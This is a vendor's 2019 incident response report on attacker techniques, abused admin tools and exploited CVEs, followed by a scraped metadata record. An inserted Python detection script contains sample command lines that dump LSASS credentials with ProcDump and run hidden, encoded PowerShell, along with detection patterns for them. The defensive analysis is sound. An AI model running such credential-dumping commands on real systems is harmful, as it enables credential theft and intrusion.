
[ Download full report (PDF)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/06094905/Kaspersky_Incident-Response-Analyst_2020.pdf>)
As an incident response service provider, Kaspersky delivers a global service that results in global visibility of adversaries' cyber-incident tactics and techniques used in the wild. In this report, we share our teams' conclusions and analysis based on incident responses and statistics from 2019. As well as a range of highlights, this report will cover the affected industries, the most widespread attack tactics and techniques, how long it took to detect and stop adversaries after initial entry and the most exploited vulnerabilities. The report also provides some high-level recommendations on how to increase resilience to attacks.
The insights used in this report come from incident investigations by Kaspersky teams from around the world. The main digital forensic and incident response operations unit is called the Global Emergency Response Team (GERT) and includes experts in Europe, Latin America, North America, Russia and the Middle East. The work of the Computer Incidents Investigation Unit (CIIU) and the Global Research and Analysis Team (GReAT) are also included in this report.
## Executive summary
In 2019, we noticed greater commitment among victims to understand the root causes of cyberattacks and improve the level of cybersecurity within their environments to reduce the probability of similar attacks taking place again in the future.
Analysis showed that less than a quarter of received requests turned out to be false positives, mostly after security tools issued alerts about suspicious files or activity. The majority of true positive incidents were triggered by the discovery of suspicious files, followed by encrypted files, suspicious activity and alerts from security tools.
Most of the incident handling requests were received from the Middle East, Europe, the CIS and Latin America, from a wide spectrum of business sectors, including industrial, financial, government, telecoms, transportation and healthcare. Industrial businesses were the most affected by cyberattacks, with oil and gas companies leading the way. They were followed by financial institutions, dominated by banks, which bore the brunt of all money theft incidents in 2019. Ransomware's presence continued in 2019 and was felt most by government bodies, telecoms and IT companies in various regions.
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05105355/sl_incident_response_01.png>)
### Verticals and industries
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05105442/sl_incident_response_02.png>)
Adversaries used a variety of initial vectors to compromise victims' environments. Initial vectors included exploitation, misconfiguration, insiders, leaked credentials and malicious removable media. The most common were exploitation of unpatched vulnerabilities and malicious emails, followed by brute-force attacks.
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110209/sl_incident_response_03.png>)
In addition to exploiting vulnerabilities, adversaries used several legitimate tools in different attack phases. This made attacks harder to discover and allowed the adversaries to keep a low profile until their goals were achieved. Most of the legitimate tools were used for credential harvesting from live systems, evading security, network discovery and unloading security solutions.
Although we started working on incidents on the first day of a request in 70% of cases, analysis revealed that the time between attack success and its discovery ranges from an average of one day in ransomware incidents to 10 days in cases of financial theft, and up to 122 days in cyber-espionage and data-theft operations.
## Recommendations
Based on 2019 incident response insights, applying the following recommendations can help protect businesses from falling victim to similar attacks:
* Apply complex password policies
* Avoid management interfaces exposed to the internet
* Only allow remote access for necessary external services with multi-factor authentication – with necessary privileges only
* Regular system audits to identify vulnerable services and misconfigurations
* Continually tune security tools to avoid false positives
* Apply powerful audit policy with log retention period of at least six months
* Monitor and investigate all alerts generated by security tools
* Patch your publicly available services immediately
* Enhance your email protection and employee awareness
* Forbid use of PsExec to simplify security operations
* Threat hunting with rich telemetry, specifically deep tracing of PowerShell to detect attacks
* Quickly engage security operations after discovering incidents to reduce potential damage and/or data loss
* Back up your data frequently and on separated infrastructure
## Reasons for incident response
Significant effects on infrastructure, such as encrypted assets, money loss, data leakage or suspicious emails, led to 30% of requests for investigations. More than 50% of requests came as a result of alerts in security toolstacks: endpoint (EPP, EDR), network (NTA) and others (FW, IDS/IPS, etc.).
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110347/sl_incident_response_04.png>)
Organizations often only become aware of an incident after a noticeable impact, even when standard security toolstacks have already produced alerts identifying some aspects of the attack. Lack of security operations staff is the most common reason for missing these indicators. Suspicious files identified by security operations and suspicious endpoint activity led to the discovery of an incident in 75% of cases, while suspicious network activities in 60% of cases were false positives.
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110436/sl_incident_response_05.png>)
One of the most common reasons for an incident response service request is a ransomware attack: a challenge even for mature security operations. For more details on types of ransomware and how to combat it, view our story "[Cities under ransomware siege](<https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/>)".
## Distribution of reasons for top regions
A suspicious file is the most prevalent reason to engage incident response services. This shows that file-oriented detection is the most popular approach in many organizations. The distribution also shows that 100% of cases involving financial cybercrime and data leakage that we investigated occurred in CIS countries.
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110519/sl_incident_response_06.png>)
## Distribution of reasons for industries
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110612/sl_incident_response_07.png>)
Although different industries suffered from different incidents, 100% of money theft incidents occurred inside the financial industry (banks).
Detection of ransomware once the repercussions had been felt occurred primarily within the government, telecom and IT sectors.
## Initial vectors or how adversaries get in
Common initial vectors include the exploitation of vulnerabilities (0- and 1-day), malicious emails and brute-force attacks. Patch management for 1-day vulnerabilities and applying password policies (or not using management interfaces on the internet) are well suited to address most cases. 0-day vulnerabilities and social engineering attacks via email are much harder to address and require a decent level of maturity from internal security operations.
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110706/sl_incident_response_08.png>)
By linking the popular initial compromise vectors with how an incident was detected, we can see that the suspicious files that were detected came from malicious emails, while cases detected after file encryption mostly took place after brute-force or vulnerability exploitation attacks.
Sometimes we act as complementary experts for a primary incident response team from the victim's organization and we have no information on all of their findings – hence the 'Unknown reasons' on the charts. Malicious emails are most likely to be detected by a variety of security toolstacks, but that does not show the distribution of 0- to 1-day vulnerabilities.
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110805/sl_incident_response_09.png>)
The distribution of how long an attack went unnoticed and how an organization was compromised shows that cases that began with vulnerability exploitation on an organization's network perimeter went unnoticed for longest. Social engineering attacks via email were the most short-lived.
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110857/sl_incident_response_10.png>)
## Tools and exploits
### 30% of all incidents were tied to legitimate tools
In cyberattacks, adversaries use legitimate tools which can't be detected as malicious utilities as they are often used in everyday activities. Suspicious events that blend with normal activity can be identified after deep analysis of a malicious attack and connecting the use of such tools to the incident. The top used tools are PowerShell, PsExec, SoftPerfect Network Scanner and ProcDump.
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110943/sl_incident_response_11.png>)
Most legitimate tools are used for harvesting credentials from memory, evading security mechanisms by unloading security solutions and for discovering services in the network. PowerShell can be used for virtually any task.
Let's weight those tools based on occurrence in incidents – we will also see tactics (MITRE ATT&CK) where they are usually applied.
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111024/sl_incident_response_12.png>)
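A sketch of the monitoring this section and the recommendations call for, as an added example that is not part of the original report: it scans process-creation events for the four tools named above and applies the policy points the report makes (PsExec forbidden, other tools limited to approved administrators). The Sysmon Event ID 1 style field names, the file-name watchlist, the allowlist and the sample events are all assumptions constructed for illustration.

```python
import json
import re
from ntpath import basename  # parses Windows paths on any OS

# Image / OriginalFileName values per tool. Assumed watchlist: extend it for your estate.
TOOLS = {
    "PowerShell": {"powershell.exe", "pwsh.exe"},
    "PsExec": {"psexec.exe", "psexec64.exe", "psexesvc.exe"},
    "ProcDump": {"procdump.exe", "procdump64.exe", "procdump"},
    "SoftPerfect Network Scanner": {"netscan.exe"},
}
# Hypothetical allowlist of (host, account) pairs with a documented need for these tools.
APPROVED = {("ADM-01", r"corp\svc-admin")}
# Encoded-command or hidden-window PowerShell switches, including short forms.
PS_FLAGS = re.compile(r"\s-(?:ec|e(?:n(?:c\w*)?)?)\s|\s-w\w*\s+hidden\b", re.I)

# Constructed sample events, one JSON object per line (not taken from any real incident).
SAMPLE_EVENTS = r"""
{"Computer":"WS-014","User":"CORP\\jdoe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","OriginalFileName":"PowerShell.EXE","CommandLine":"powershell.exe -NoP -W Hidden -Enc QQBCAEMA"}
{"Computer":"ADM-01","User":"CORP\\svc-admin","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","OriginalFileName":"PowerShell.EXE","CommandLine":"powershell.exe -File C:\\Scripts\\rotate-logs.ps1"}
{"Computer":"SRV-DB2","User":"CORP\\svc-admin","Image":"C:\\Users\\Public\\pd.exe","OriginalFileName":"procdump","CommandLine":"pd.exe -accepteula -ma lsass.exe C:\\Users\\Public\\out.dmp"}
{"Computer":"FS-03","User":"NT AUTHORITY\\SYSTEM","Image":"C:\\Windows\\PSEXESVC.exe","OriginalFileName":"psexesvc.exe","CommandLine":"C:\\Windows\\PSEXESVC.exe"}
{"Computer":"WS-022","User":"CORP\\asmith","Image":"C:\\Temp\\netscan.exe","OriginalFileName":"netscan.exe","CommandLine":"netscan.exe"}
{"Computer":"ADM-01","User":"CORP\\svc-admin","Image":"C:\\Tools\\netscan.exe","OriginalFileName":"netscan.exe","CommandLine":"netscan.exe"}
{"Computer":"WS-014","User":"CORP\\jdoe","Image":"C:\\Windows\\System32\\notepad.exe","OriginalFileName":"NOTEPAD.EXE","CommandLine":"notepad.exe report.txt"}
"""


def identify_tool(event):
    """Match on file name and on the PE OriginalFileName, so a renamed binary is still seen."""
    names = {basename(event.get("Image", "")).lower(),
             event.get("OriginalFileName", "").lower()}
    for tool, known in TOOLS.items():
        if names & known:
            return tool
    return None


def evaluate(event):
    """Return (severity, reason) for an event that needs review, else None."""
    tool = identify_tool(event)
    cmd = event.get("CommandLine", "")
    who = (event.get("Computer", "").upper(), event.get("User", "").lower())
    if tool == "ProcDump" and re.search(r"\blsass\b", cmd, re.I):
        return "critical", "ProcDump run against LSASS (credential harvesting from memory)"
    if tool == "PsExec":
        return "high", "PsExec present although policy forbids it"
    if tool == "PowerShell":
        if PS_FLAGS.search(cmd):
            return "high", "PowerShell with encoded command or hidden window"
        return None  # plain PowerShell is too common to alert on by itself
    if tool and who not in APPROVED:
        return "medium", f"{tool} used outside the approved host/account list"
    return None


def hunt(lines):
    """Evaluate every JSON line and collect the events that need an analyst's attention."""
    findings = []
    for line in lines.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        verdict = evaluate(event)
        if verdict:
            findings.append({"host": event["Computer"], "user": event["User"],
                             "tool": identify_tool(event),
                             "severity": verdict[0], "reason": verdict[1]})
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f['severity']:8}] {f['host']:7} {f['user']:20} {f['reason']}")
```

Forbidding PsExec outright, as the recommendations suggest, is what lets that rule fire on any occurrence without an allowlist lookup.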
### Exploits
Most of the exploits identified in incident cases target vulnerabilities that appeared in 2019. Alongside them, a well-known remote code execution vulnerability in the Windows SMB service (MS17-010) is being actively exploited by a large number of adversaries.
**Vulnerability** | **Affected product** | **Description**
---|---|---
**MS17-010** | _SMB service in Microsoft Windows_ | Remote code execution vulnerability that was used in several large attacks such as WannaCry, NotPetya, WannaMine, etc.
**CVE-2019-0604** | _Microsoft Sharepoint_ | Remote code execution vulnerability allows adversaries to execute arbitrary code without authentication in Microsoft Sharepoint.
**CVE-2019-19781** | _Citrix Application Delivery Controller & Citrix Gateway_ | This vulnerability allows unauthenticated remote code execution on all hosts connected to Citrix infrastructure.
**CVE-2019-0708** | _RDP service in Microsoft Windows_ | Remote code execution vulnerability (codename: BlueKeep) for a very widespread and, unfortunately, frequently publicly available RDP service.
**CVE-2018-7600** | _Drupal_ | Remote code execution vulnerability also known as Drupalgeddon2. Widely used in installation of backdoors, web miners and other malware on compromised web servers.
**CVE-2019-11510** | _Pulse Secure SSL VPN_ | Unauthenticated retrieval of VPN server user credentials. Instant access to victim organization through legitimate channel.
## Attack duration
For a number of incidents, Kaspersky specialists have established the time period between the beginning of an adversary's activity and the end of the attack. As a result of the subsequent analysis, all incidents were divided into three categories of attack duration.
**Category** | **Rush: hours or days** | **Average: weeks** | **Long-lasting: months or longer**
---|---|---|---
**Description** | This category includes attacks lasting up to a week. These are mainly incidents involving ransomware attacks. Due to the high speed of development, effective counteraction to these attacks is possible only by preventive methods. In some cases, a delay of up to a week has been observed between the initial compromise and the beginning of the adversary's activity. | This group includes attacks that have been developing for a week or several weeks. In most cases, this activity was aimed at the direct theft of money. Typically, the adversaries achieved their goals within a week. | Incidents that lasted more than a month were included in this group. This activity is almost always aimed at stealing sensitive data. Such attacks are characterized by interchanging active and passive phases. The total duration of active phases is on average close to the duration of attacks from the previous group.
**Common threat** | Ransomware infection | Financial theft | Cyber-espionage and theft of confidential data
**Common attack vector** | Downloading of a malicious file by link in email; downloading of a malicious file from infected site; exploitation of vulnerabilities on network perimeter; credentials brute-force attack | Downloading a malicious file by link in email; exploitation of vulnerabilities on network perimeter | Exploitation of vulnerabilities on network perimeter
**Attack duration (median)** | 1 day | 10 days | 122 days
**Incident response duration** | Hours to days | Weeks | Weeks
## Operational metrics
### False positives rate
False positives in incident responses are a very expensive exercise. A false positive means that triage of a security event led to the involvement of incident response experts who later ascertained that there was no incident. Usually this is a sign that an organization doesn't have a specialist in threat hunting or they are managed by an external SOC that doesn't have the full context for an event.
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111207/sl_incident_response_13.png>)
### Age of attack
This is the time taken to detect an incident by an organization after an attack starts. Usually detecting the attack in the first few hours or even days is good; with more low-profile attacks it can take weeks, which is still OK, but taking months or years is definitely bad.
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111254/sl_incident_response_14.png>)
## How fast we responded
How long it took us to respond after an organization contacted us. 70% of the time we start work from day one, but in some cases a variety of factors can influence the timeframe.
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111342/sl_incident_response_15.png>)
## How long response took
Distribution of the time required for incident response activities can vary from a few hours to months based on how deep the adversaries were able to dig into the compromised network and how old the first compromise is.
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111429/sl_incident_response_16.png>)
## MITRE ATT&CK tactics and techniques
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111538/sl_incident_response_17.png>)
[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111649/sl_incident_response_18.png>)
## Conclusion
In 2019, the cyberattack curve was not flattened. There was an increase in the number of incidents accompanied by greater commitment among victims to understand the full attack picture. Victims from all regions suffered from a variety of attacks and all business types were targeted.
Improved security and audit planning with continuous maintenance of procedures along with rapid patch management could have minimized damages and losses in many of the analyzed incidents. In addition, having security monitoring and an investigation plan either on-premises or performed by a third party could have helped in stopping adversaries in the early phases of the attack chain, or in starting detection immediately after compromise.
Various tactics and techniques were used by adversaries to achieve their targets, trying multiple times till they succeeded. This indicates the importance of security being an organized process with continuous improvements instead of separate, independent actions.
Adversaries made greater use of legitimate tools in different phases of their cyberattacks, especially in the early phases. This highlights the need to monitor and justify the use of legitimate administration tools and scanning utilities within internal networks, limiting their use to administrators and necessary actions only.
Applying a powerful auditing policy with a log retention period of at least six months can help reduce analysis times during incident investigation and help limit the types of damage caused. Having insufficient logs on endpoints and network levels means it takes longer to collect and analyze evidence from different data sources in order to gain a complete picture of an attack.
{"id": "SECURELIST:35644FF079836082B5B728F8E95F0EDD", "type": "securelist", "bulletinFamily": "blog", "title": "Incident Response Analyst Report 2019", "description": "\n\n[ Download full report (PDF)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/06094905/Kaspersky_Incident-Response-Analyst_2020.pdf>)\n\nAs an incident response service provider, Kaspersky delivers a global service that results in global visibility of adversaries' cyber-incident tactics and techniques used in the wild. In this report, we share our teams' conclusions and analysis based on incident responses and statistics from 2019. As well as a range of highlights, this report will cover the affected industries, the most widespread attack tactics and techniques, how long it took to detect and stop adversaries after initial entry and the most exploited vulnerabilities. The report also provides some high-level recommendations on how to increase resilience to attacks.\n\nThe insights used in this report come from incident investigations by Kaspersky teams from around the world. The main digital forensic and incident response operations unit is called the Global Emergency Response Team (GERT) and includes experts in Europe, Latin America, North America, Russia and the Middle East. The work of the Computer Incidents Investigation Unit (CIIU) and the Global Research and Analysis Team (GReAT) are also included in this report.\n\n## Executive summary\n\nIn 2019, we noticed greater commitment among victims to understand the root causes of cyberattacks and improve the level of cybersecurity within their environments to reduce the probability of similar attacks taking place again in the future.\n\nAnalysis showed that less than a quarter of received requests turned out to be false positives, mostly after security tools issued alerts about suspicious files or activity. 
The majority of true positive incidents were triggered by the discovery of suspicious files, followed by encrypted files, suspicious activity and alerts from security tools.\n\nMost of the incident handling requests were received from the Middle East, Europe, the CIS and Latin America, from a wide spectrum of business sectors, including industrial, financial, government, telecoms, transportation and healthcare. Industrial businesses were the most affected by cyberattacks, with oil and gas companies leading the way. They were followed by financial institutions, dominated by banks, which bore the brunt of all money theft incidents in 2019. Ransomware's presence continued in 2019 and was felt most by government bodies, telecoms and IT companies in various regions.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05105355/sl_incident_response_01.png>)\n\n### \n\n### Verticals and industries\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05105442/sl_incident_response_02.png>)\n\nAdversaries used a variety of initial vectors to compromise victims' environments. Initial vectors included exploitation, misconfiguration, insiders, leaked credentials and malicious removable media. But the most common were exploitation of unpatched vulnerabilities, malicious emails, followed by brute-force attacks.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110209/sl_incident_response_03.png>)\n\nIn addition to exploiting vulnerabilities, adversaries used several legitimate tools in different attack phases. This made attacks harder to discover and allowed the adversaries to keep a low profile until their goals were achieved. 
Most of the legitimate tools were used for credential harvesting from live systems, evading security, network discovery and unloading security solutions.\n\nAlthough we started working on incidents the first day of a request in 70% of cases, analysis revealed that the time between attack success and its discovery varies between an average of one day in ransomware incidents to 10 days in cases of financial theft, up to 122 days in cyber-espionage and data-theft operations.\n\n## Recommendations\n\nBased on 2019 incident response insights, applying the following recommendations can help protect businesses from falling victim to similar attacks:\n\n * Apply complex password policies\n * Avoid management interfaces exposed to the internet\n * Only allow remote access for necessary external services with multi-factor authentication \u2013 with necessary privileges only\n * Regular system audits to identify vulnerable services and misconfigurations\n * Continually tune security tools to avoid false positives\n * Apply powerful audit policy with log retention period of at least six months\n * Monitor and investigate all alerts generated by security tools\n * Patch your publicly available services immediately\n * Enhance your email protection and employee awareness\n * Forbid use of PsExec to simplify security operations\n * Threat hunting with rich telemetry, specifically deep tracing of PowerShell to detect attacks\n * Quickly engage security operations after discovering incidents to reduce potential damage and/or data loss\n * Back up your data frequently and on separated infrastructure\n\n \n\n## Reasons for incident response\n\nSignificant effects on infrastructure, such as encrypted assets, money loss, data leakage or suspicious emails, led to 30% of requests for investigations. 
More than 50% of requests came as a result of alerts in security toolstacks: endpoint (EPP, EDR), network (NTA) and others (FW, IDS/IPS, etc.).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110347/sl_incident_response_04.png>)\n\nOrganizations often only become aware of an incident after a noticeable impact, even when standard security toolstacks have already produced alerts identifying some aspects of the attack. Lack of security operations staff is the most common reason for missing these indicators. Suspicious files identified by security operations and suspicious endpoint activity led to the discovery of an incident in 75% of cases, while suspicious network activities in 60% of cases were false positives.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110436/sl_incident_response_05.png>)\n\nOne of the most common reasons for an incident response service request is a ransomware attack: a challenge even for mature security operations. For more details on types of ransomware and how to combat it, view our story "[Cities under ransomware siege](<https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/>)".\n\n \n\n## Distribution of reasons for top regions\n\nA suspicious file is the most prevalent reason to engage incident response services. This shows that file-oriented detection is the most popular approach in many organizations. 
The distribution also shows that 100% of cases involving financial cybercrime and data leakage that we investigated occurred in CIS countries.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110519/sl_incident_response_06.png>)\n\n## Distribution of reasons for industries\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110612/sl_incident_response_07.png>)\n\nAlthough, different industries suffered from different incidents, 100% of money theft incidents occurred inside the financial industry (banks).\n\nDetection of ransomware once the repercussions had been felt occurred primarily within the government, telecom and IT sectors.\n\n## Initial vectors or how adversaries get in\n\nCommon initial vectors include the exploitation of vulnerabilities (0- and 1-day), malicious emails and brute-force attacks. Patch management for 1-day vulnerabilities and applying password policies (or not using management interfaces on the internet) are well suited to address most cases. 0-day vulnerabilities and social engineering attacks via email are much harder to address and require a decent level of maturity from internal security operations.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110706/sl_incident_response_08.png>)\n\nBy linking the popular initial compromise vectors with how an incident was detected, we can see detected suspicious files were detected from malicious emails. And cases detected after file encryption mostly took place after brute-force or vulnerability exploitation attacks. \nSometimes we act as complimentary experts for a primary incident response team from the victim's organization and we have no information on all of their findings \u2013 hence the 'Unknown reasons' on the charts. 
Malicious emails are most likely to be detected by a variety of security toolstack, but that's not showing distrubution of 0- to 1-day vulnerabilities.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110805/sl_incident_response_09.png>)\n\nThe distribution of how long an attack went unnoticed and how an organization was compromised shows that cases that begin with vulnerability exploitation on an organization's network perimeter went unnoticed for longest. Social enginnering attacks via email were the most short-lived.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110857/sl_incident_response_10.png>)\n\n## Tools and exploits\n\n### 30% of all incidents were tied to legitimate tools\n\nIn cyberattacks, adversaries use legitimate tools which can't be detected as malicious utilities as they are often used in everyday activities. Suspicious events that blend with normal activity can be identified after deep analysis of a malicious attack and connecting the use of such tools to the incident. The top used tools are PowerShell, PsExec, SoftPerfect Network Scanner and ProcDump.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05110943/sl_incident_response_11.png>)\n\nMost legitimate tools are used for harvesting credentials from memory, evading security mechanisms by unloading security solutions and for discovering services in the network. 
PowerShell can be used virtually for any task.\n\nLet's weight those tools based on occurrence in incidents \u2013 we will also see tactics (MITRE ATT&CK) where they are usually applied.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111024/sl_incident_response_12.png>)\n\n### Exploits\n\nMost of the identified exploits in incident cases appeared in 2019 along with a well-known remote code execution vulnerability in Windows SMB service (MS17-010) being actively exploited by a large number of adversaries.\n\n**MS17-010** _SMB service in Microsoft Windows_ \nRemote code execution vulnerability that was used in several large attacks such as WannaCry, NotPetya, WannaMine, etc. | **CVE-2019-0604** _Microsoft Sharepoint_ \nRemote code execution vulnerability allows adversaries to execute arbitrary code without authentication in Microsoft Sharepoint. | **CVE-2019-19781** _Citrix Application Delivery Controller & Citrix Gateway_ \nThis vulnerability allows unauthenticated remote code execution on all hosts connected to Citrix infrastructure. \n---|---|--- \n**CVE-2019-0708** _RDP service in Microsoft Windows_ \nRemote code execution vulnerability (codename: BlueKeep) for a very widespread and, unfortunately, frequently publicly available RDP service. | **CVE-2018-7600** _Drupal_ \nRemote code execution vulnerability also known as Drupalgeddon2. Widely used in installation of backdoors, web miners and other malware on compromised web servers. | **CVE-2019-11510** _Pulse Secure SSL VPN_ \nUnauthenticated retrieval of VPN server user credentials. Instant access to victim organization through legitimate channel. \n \n## Attack duration\n\nFor a number of incidents, Kaspersky specialists have established the time period between the beginning of an adversary's activity and the end of the attack. 
As a result of the subsequent analysis, all incidents were divided into three categories of attack duration.\n\n**Rush hours or days** | **Average weeks** | **Long-lasting months or longer** \n---|---|--- \nThis category includes attacks lasting up to a week. These are mainly incidents involving ransomware attacks. Due to the high speed of development, effective counteraction to these attacks is possible only by preventive methods. \nIn some cases, a delay of up to a week has been observed between the initial compromise and the beginning of the adversary's activity. | This group includes attacks that have been developing for a week or several weeks. In most cases, this activity was aimed at the direct theft of money. Typically, the adversaries achieved their goals within a week. | Incidents that lasted more than a month were included in this group. This activity is almost always aimed at stealing sensitive data. \nSuch attacks are characterized by interchanging active and passive phases. The total duration of active phases is on average close to the duration of attacks from the previous group. 
\n**Common threat:** \nRansomware infection | **Common threat:** \nFinancial theft | **Common threat:** \nCyber-espionage and theft of confidential data \n**Common attack vector:**\n\n * Downloading of a malicious file by link in email\n * Downloading of a malicious file from infected site\n * Exploitation of vulnerabilities on network perimeter\n * Credentials brute-force attack\n| **Common attack vector:**\n\n * Downloading a malicious file by link in email\n * Exploitation of vulnerabilities on network perimeter\n| **Common attack vector:**\n\n * Exploitation of vulnerabilities on network perimeter \n**Attack duration (median):** \n1 day | **Attack duration (median):** \n10 days | **Attack duration (median):** \n122 days \n**Incident response duration:** \nHours to days | **Incident response duration:** \nWeeks | **Incident response duration:** \nWeeks \n \n## Operational metrics\n\n### False positives rate\n\nFalse positives in incident responses are a very expensive exercise. A false positive means that triage of a security event led to the involvement of incident response experts who later ascertained that there was no incident. Usually this is a sign that an organization doesn't have a specialist in threat hunting or they are managed by an external SOC that doesn't have the full context for an event.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111207/sl_incident_response_13.png>)\n\n### Age of attack\n\nThis is the time taken to detect an incident by an organization after an attack starts. Usually detecting the attack in the first few hours or even days is good; with more low-profile attacks it can take weeks, which is still OK, but taking months or years is definitely bad.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/05111254/sl_incident_response_14.png>)\n\n## How fast we responded\n\nHow long it took us to respond after an organization contacted us. 
70% of the time we start work from day one, but in some cases a variety of factors can influence the timeframe.

## How long response took

The time required for incident response activities can vary from a few hours to months, depending on how deep the adversaries were able to dig into the compromised network and how old the first compromise is.

## MITRE ATT&CK tactics and techniques

[Figure: MITRE ATT&CK tactics and techniques]

## Conclusion

In 2019, the cyberattack curve was not flattened. There was an increase in the number of incidents accompanied by greater commitment among victims to understand the full attack picture. Victims from all regions suffered from a variety of attacks and all business types were targeted.

Improved security and audit planning with continuous maintenance of procedures along with rapid patch management could have minimized damages and losses in many of the analyzed incidents. In addition, having security monitoring and an investigation plan, either on-premises or performed by a third party, could have helped in stopping adversaries in the early phases of the attack chain, or in starting detection immediately after compromise.

Adversaries used various tactics and techniques to achieve their targets, trying multiple times until they succeeded.
This indicates the importance of security being an organized process with continuous improvements instead of separate, independent actions.

Adversaries made greater use of legitimate tools in different phases of their cyberattacks, especially in the early phases. This highlights the need to monitor and justify the use of legitimate administration tools and scanning utilities within internal networks, limiting their use to administrators and necessary actions only.

Applying a powerful auditing policy with a log retention period of at least six months can help reduce analysis times during incident investigation and help limit the types of damage caused. Having insufficient logs on endpoints and network levels means it takes longer to collect and analyze evidence from different data sources in order to gain a complete picture of an attack.", "published": "2020-08-06T10:00:34", "modified": "2020-08-06T10:00:34", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://securelist.com/incident-response-analyst-report-2019/97974/", "reporter": "Ayman Shaaban", "references": [], "cvelist": ["CVE-2018-7600", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-11510", "CVE-2019-19781"], "lastseen": "2020-08-07T08:03:43", "viewCount": 84, "enchantments": {"dependencies": {"references": [{"type": "alpinelinux", "idList": ["ALPINE:CVE-2018-7600"]}, {"type": "archlinux", "idList": ["ASA-201804-1"]}, {"type": "attackerkb", "idList": ["AKB:0C69B33C-2322-4075-BE16-A92593B75107", "AKB:0FA0C973-1E4C-48B7-BA36-DBE63803563D", "AKB:131226A6-A1E9-48A1-A5D0-AC94BAF8DFD2", "AKB:17442CEB-043D-4879-BE5C-FC920511E791", "AKB:236680FB-F804-4F5D-B51D-4B50C9F69BBD", "AKB:3374FB55-2A44-4607-A9C5-265E7DE9B936", "AKB:75221F03-CFA1-478E-9777-568E523E3272", "AKB:86F390BB-7946-4223-970A-D493D6DD1E0A", "AKB:AFC76977-D355-470D-A7F6-FEF7A8352B65", "AKB:DF071775-CD3A-4643-9E29-3368BD93C00F", "AKB:F0223615-0DEB-4BCC-8CF7-F9CED07F1876"]}, {"type": "avleonov", "idList": 
[]}]}, "score": {"value": 1.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "openvas", "idList": [
